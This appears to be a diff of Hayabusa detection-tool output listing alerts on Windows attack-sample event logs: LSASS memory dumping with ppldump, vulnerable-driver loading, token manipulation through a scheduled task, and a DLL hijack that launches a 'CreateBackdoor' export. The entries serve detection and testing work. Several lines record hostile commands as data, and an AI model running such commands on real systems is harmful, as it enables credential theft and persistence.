+2020-02-10 17:28:13.147 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Supicious image loaded - ntoskrnl | Image: C:\Windows\System32\ntoskrnl.exe | Process: C:\Users\Public\BYOV\TDL\Furutaka.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 3768 | PGUID: 747F3D96-141C-5E41-0000-0010788B1E00 | Hash: SHA1=667AFD98C8BAA2CF95C9EE087CB36A0F6508A942,MD5=0EED97AD8D855B5EDF948A7866D5F874,SHA256=C36A8FAC48690632731D56747CBBDCE2453D3E5303A73896505D495F7678DFF0,IMPHASH=4D717BA02FC8AA76777B033C52AA4694",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DSE_bypass_BYOV_TDL_dummydriver_sysmon_6_7_13.evtx
+2020-02-10 19:08:24.535 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"suspicious execution path | Cmd: ppldump.exe -p lsass.exe -o a.png | Process: C:\Users\Public\BYOV\ZAM64\ppldump.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x97734 | PID: 5016 | PGUID: 747F3D96-2B98-5E41-0000-00109C904700 | Hash: SHA1=C8BBBB2554D7C1F29B8670A14BE4E52D7AF81A24,MD5=DD7D6D8101A6412ABFA7B55F10E1D31B,SHA256=70908F9BBC59198FEBE0D1CA0E34A9E79C68F5053A39A0BA0C6F6CEC9ED1A875,IMPHASH=0EFF65F1D3AC0A58787724FB03E2D1BC",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_BYOV_Zam64_CA_Memdump_sysmon_7_10.evtx
+2020-02-10 19:08:24.535 +09:00,MSEDGEWIN10,1,high,Evas,Execution from Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_BYOV_Zam64_CA_Memdump_sysmon_7_10.evtx
+2020-02-10 19:08:24.666 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: c:\Users\Public\BYOV\ZAM64\ppldump.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 5016 | Src PGUID: 747F3D96-2B98-5E41-0000-00109C904700 | Tgt PID: 624 | Tgt PGUID: 747F3D96-A042-5E41-0000-0010E4560000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_BYOV_Zam64_CA_Memdump_sysmon_7_10.evtx
+2020-02-10 19:08:24.666 +09:00,MSEDGEWIN10,10,high,CredAccess,LSASS Memory Access by Tool Named Dump,,../hayabusa-rules/sigma/process_access/sysmon_lsass_memdump_indicators.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_BYOV_Zam64_CA_Memdump_sysmon_7_10.evtx
+2020-02-10 19:08:24.666 +09:00,MSEDGEWIN10,10,high,CredAccess,LSASS Access from Program in Suspicious Folder,,../hayabusa-rules/sigma/process_access/win_susp_proc_access_lsass_susp_source.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_BYOV_Zam64_CA_Memdump_sysmon_7_10.evtx
+2020-02-10 19:08:25.164 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Suspicious ImageLoad - Possible Memdump | Image: C:\Windows\System32\dbgcore.dll | Process: C:\Windows\System32\lsass.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 624 | PGUID: 747F3D96-A042-5E41-0000-0010E4560000 | Hash: SHA1=E3FA87C983008D4D2A5D31708415F88548FC7702,MD5=88E88D8C1C663769BDD722000A7EB5A7,SHA256=C84BECA73EA45D3C53D9C42CD6A37CC0CC07FF57D9CFEE113CDF70F640572AEF,IMPHASH=9D75F08EA29885182B136CE4FF854114",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_BYOV_Zam64_CA_Memdump_sysmon_7_10.evtx
+2020-02-10 19:08:25.193 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Suspicious ImageLoad - Possible Memdump | Image: C:\Windows\System32\dbghelp.dll | Process: C:\Windows\System32\lsass.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 624 | PGUID: 747F3D96-A042-5E41-0000-0010E4560000 | Hash: SHA1=8B5BC2EAA00C530DF0FF139635E428FA4C5D7AA8,MD5=B0A68C5BB8D5493F1AF967F0FDD80382,SHA256=2CF0972DC8A67D863AD1A6205B66C80865ACC11F7E3F67B4A76C162655EE0FEE,IMPHASH=AB902346D2BD8706EE70C87E00136BAC",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_BYOV_Zam64_CA_Memdump_sysmon_7_10.evtx
+2020-02-10 19:08:25.193 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Suspicious ImageLoad - Possible Memdump | Image: C:\Windows\System32\dbghelp.dll | Process: C:\Windows\System32\lsass.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 624 | PGUID: 747F3D96-A042-5E41-0000-0010E4560000 | Hash: SHA1=8B5BC2EAA00C530DF0FF139635E428FA4C5D7AA8,MD5=B0A68C5BB8D5493F1AF967F0FDD80382,SHA256=2CF0972DC8A67D863AD1A6205B66C80865ACC11F7E3F67B4A76C162655EE0FEE,IMPHASH=AB902346D2BD8706EE70C87E00136BAC",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_BYOV_Zam64_CA_Memdump_sysmon_7_10.evtx
+2020-02-10 19:08:27.797 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\Public\BYOV\ZAM64\ppldump.exe | PID: 5016 | PGUID: 747F3D96-2B98-5E41-0000-00109C904700,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_BYOV_Zam64_CA_Memdump_sysmon_7_10.evtx
+2020-02-11 20:05:37.148 +09:00,MSEDGEWIN10,6,medium,Evas,Driver Loaded_Unsigned,"Path: C:\Windows\System32\drivers\RwDrv.sys | Status: Valid | Hash: SHA1=66E95DAEE3D1244A029D7F3D91915F1F233D1916,MD5=60E84516C6EC6DFDAE7B422D1F7CAB06,SHA256=D969845EF6ACC8E5D3421A7CE7E244F419989710871313B04148F9B322751E5D,IMPHASH=955E7B12A8FA06444C68E54026C45DE1",../hayabusa-rules/hayabusa/sysmon/alerts/6_DriverLoaded_Unsigned.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_UEFI_Settings_rweverything_sysmon_6.evtx
+2020-02-11 20:05:37.148 +09:00,MSEDGEWIN10,6,info,,Signed Driver Loaded,Path: C:\Windows\System32\drivers\RwDrv.sys | Signature: ChongKim Chan,../hayabusa-rules/hayabusa/sysmon/events/6_DriverLoaded_Signed.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_UEFI_Settings_rweverything_sysmon_6.evtx
+2020-03-07 22:17:38.534 +09:00,MSEDGEWIN10,4698,info,,Task Created,"Name: \FullPowersTask | Content: <?xml version=""1.0"" encoding=""UTF-16""?> <Task version=""1.3"" xmlns=""http://schemas.microsoft.com/windows/2004/02/mit/task""> <RegistrationInfo> <URI>\FullPowersTask</URI> </RegistrationInfo> <Triggers /> <Principals> <Principal id=""Author""> <UserId>S-1-5-19</UserId> <RunLevel>LeastPrivilege</RunLevel> <RequiredPrivileges> <Privilege>SeAssignPrimaryTokenPrivilege</Privilege> <Privilege>SeAuditPrivilege</Privilege> <Privilege>SeChangeNotifyPrivilege</Privilege> <Privilege>SeCreateGlobalPrivilege</Privilege> <Privilege>SeImpersonatePrivilege</Privilege> <Privilege>SeIncreaseQuotaPrivilege</Privilege> <Privilege>SeIncreaseWorkingSetPrivilege</Privilege> </RequiredPrivileges> </Principal> </Principals> <Settings> <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy> <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries> <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries> <AllowHardTerminate>true</AllowHardTerminate> <StartWhenAvailable>false</StartWhenAvailable> <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable> <IdleSettings> <Duration>PT10M</Duration> <WaitTimeout>PT1H</WaitTimeout> <StopOnIdleEnd>true</StopOnIdleEnd> <RestartOnIdle>false</RestartOnIdle> </IdleSettings> <AllowStartOnDemand>true</AllowStartOnDemand> <Enabled>true</Enabled> <Hidden>false</Hidden> <RunOnlyIfIdle>false</RunOnlyIfIdle> <DisallowStartOnRemoteAppSession>false</DisallowStartOnRemoteAppSession> <UseUnifiedSchedulingEngine>false</UseUnifiedSchedulingEngine> <WakeToRun>false</WakeToRun> <ExecutionTimeLimit>PT72H</ExecutionTimeLimit> <Priority>7</Priority> </Settings> <Actions Context=""Author""> <Exec> <Command>C:\Users\Public\Tools\TokenManip\FullPowers.exe</Command> <Arguments>-t 4932</Arguments> </Exec> </Actions> </Task> | User: LOCAL SERVICE | LID: 0x3e5",../hayabusa-rules/hayabusa/non-default/events/Security/ScheduledTasks/4698_ScheduledTaskCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_SeImpersonatePriv_enabled_back_for_upnp_localsvc_4698.evtx
+2020-03-07 22:17:39.984 +09:00,MSEDGEWIN10,4699,info,,Task Deleted,Name: \FullPowersTask | User: LOCAL SERVICE | LID: 0x3e5,../hayabusa-rules/hayabusa/non-default/events/Security/ScheduledTasks/4699_ScheduledTaskDeleted.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_SeImpersonatePriv_enabled_back_for_upnp_localsvc_4698.evtx
+2020-03-07 22:17:39.984 +09:00,MSEDGEWIN10,4699,medium,Exec | PrivEsc,Scheduled Task Deletion,,../hayabusa-rules/sigma/builtin/security/win_scheduled_task_deletion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_SeImpersonatePriv_enabled_back_for_upnp_localsvc_4698.evtx
+2020-03-09 07:11:34.340 +09:00,MSEDGEWIN10,4656,critical,CredAccess,LSASS Access from Non System Account,,../hayabusa-rules/sigma/builtin/security/win_lsass_access_non_system_account.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_hashdump_4663_4656_lsass_access.evtx
+2020-03-09 07:11:34.340 +09:00,MSEDGEWIN10,4656,high,CredAccess,Generic Password Dumper Activity on LSASS,,../hayabusa-rules/sigma/builtin/security/win_susp_lsass_dump_generic.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_hashdump_4663_4656_lsass_access.evtx
+2020-03-09 07:11:34.340 +09:00,MSEDGEWIN10,4663,high,CredAccess,Generic Password Dumper Activity on LSASS,,../hayabusa-rules/sigma/builtin/security/win_susp_lsass_dump_generic.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_hashdump_4663_4656_lsass_access.evtx
+2020-03-21 14:00:16.296 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: usoclient StartInteractiveScan | Process: C:\Windows\System32\UsoClient.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x2935f | PID: 2276 | PGUID: 747F3D96-9F60-5E75-0000-001081BE1D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:16.507 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Persistence - Suspicious Schedule.Service Module Load | Image: C:\Windows\System32\taskschd.dll | Process: C:\Windows\System32\svchost.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 7696 | PGUID: 747F3D96-9F60-5E75-0000-0010E7CC1D00 | Hash: SHA1=60FC364639C2264F76A00B153AC153751CC179F8,MD5=33446D4A3C3F2A2CD1051F91649C02C3,SHA256=DEBD522F85D48FD8244F67B478DE85167F0EDE6C341E3F3A0272BEB8D984477E,IMPHASH=8C2ED772723C9E5FAEA539B0F8C1C8E7",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:17.016 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Persistence - Suspicious Schedule.Service Module Load | Image: C:\Windows\System32\taskschd.dll | Process: C:\Windows\System32\svchost.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 4696 | PGUID: 747F3D96-9F60-5E75-0000-00104ADA1D00 | Hash: SHA1=60FC364639C2264F76A00B153AC153751CC179F8,MD5=33446D4A3C3F2A2CD1051F91649C02C3,SHA256=DEBD522F85D48FD8244F67B478DE85167F0EDE6C341E3F3A0272BEB8D984477E,IMPHASH=8C2ED772723C9E5FAEA539B0F8C1C8E7",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:17.980 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:17.980 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 4848 | PGUID: 747F3D96-9F61-5E75-0000-0010686A1E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:17.982 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:17.992 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 8116 | PGUID: 747F3D96-9F61-5E75-0000-0010736B1E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:17.996 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:17.997 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 6620 | PGUID: 747F3D96-9F61-5E75-0000-00109B6C1E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:17.998 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 4848 | PGUID: 747F3D96-9F61-5E75-0000-0010686A1E00 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:18.003 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 8116 | PGUID: 747F3D96-9F61-5E75-0000-0010736B1E00 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:18.005 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:18.007 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 7124 | PGUID: 747F3D96-9F61-5E75-0000-00103D6F1E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:18.011 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 6620 | PGUID: 747F3D96-9F61-5E75-0000-00109B6C1E00 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:18.011 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:18.014 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 7380 | PGUID: 747F3D96-9F61-5E75-0000-001056711E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:18.018 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 7124 | PGUID: 747F3D96-9F61-5E75-0000-00103D6F1E00 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:18.024 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 7380 | PGUID: 747F3D96-9F61-5E75-0000-001056711E00 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:18.042 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:18.046 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 8076 | PGUID: 747F3D96-9F61-5E75-0000-001059841E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:18.050 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 8076 | PGUID: 747F3D96-9F61-5E75-0000-001059841E00 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
+2020-03-21 14:00:19.873 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Suspicious ImageLoad - Possible Memdump | Image: C:\Windows\System32\dbghelp.dll | Process: C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.17763.1090_none_5715d73398f9ea47\TiWorker.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 6420 | PGUID: 747F3D96-9F63-5E75-0000-0010BCD01F00 | Hash: SHA1=8B5BC2EAA00C530DF0FF139635E428FA4C5D7AA8,MD5=B0A68C5BB8D5493F1AF967F0FDD80382,SHA256=2CF0972DC8A67D863AD1A6205B66C80865ACC11F7E3F67B4A76C162655EE0FEE,IMPHASH=AB902346D2BD8706EE70C87E00136BAC",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
